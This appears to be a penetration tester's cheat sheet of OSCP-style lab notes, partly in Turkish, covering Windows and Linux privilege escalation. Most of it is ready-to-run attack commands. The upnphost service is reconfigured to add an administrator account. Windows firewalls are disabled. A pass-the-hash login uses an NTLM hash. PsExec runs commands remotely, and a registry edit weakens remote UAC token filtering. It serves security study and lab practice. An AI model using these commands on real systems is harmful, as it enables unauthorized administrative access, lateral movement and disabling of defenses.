keepnote
file transfer;
Winpriv check:
https://github.com/codingo/OSCP-2/blob/master/Windows/WinPrivCheck.bat
Local Privilege Escalation Abusing Misconfiguration Service (upnphost):
accesschk.exe -uwcqv "Authenticated Users" /accepteula accesschk-xp.exe -uwcqv "Authenticated Users" /accepteula
accesschk.exe -ucqv upnphost sc config upnphost depend= "" sc config upnphost binpath= "net user testxlab Password1 /add" sc config upnphost binpath= "net localgroup Administrators testxlab /add"
sc stop upnphost sc start upnphost
File Transfer via FTP
ftp > binary
ftp> put /root/Downloads/accesschk.exe accesschk.exe
cadaver http://10.11.1.14/
Python Interactive Shell
pty spawn python3 -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
Disable Windows firewall on newer versions:
NetSh Advfirewall set allprofiles state off
Disable windows firewall on older windows:
netsh firewall set opmode disable
Referans
priv esc linux - hacking articler (abuse path variable.) https://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/ https://www.siberportal.org/red-team/linux-penetration-tests/linux-sizma-testlerinde-hak-yukseltme-yontemleri/
priv esc - cronjob https://www.hackingarticles.in/linux-privilege-escalation-by-exploiting-cron-jobs/
priv esc - windows - servisler - sc https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
PtH
pth-winexe -U alice%aad3b435b51404eeaad3b435b51404ee:B74242F37E47371AFF835A6EBCAC4FFE //10.11.1.49 cmd.exe
via sysinternals tools and mimikatz
PtH get user ntlm hash. (via RDP, MSF or other)
then open new cmd. you can run command via psexec.
windows> PsExec.exe \\{IP} cmd
Tip: General usage with password:
PsExec.exe \\{IP} -u {DOMAIN\USERNAME} -p {PASSWORD} cmd
if got "Couldn't access otherComputer: Access is denied." ERROR:
run the following command at target system:
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
Last updated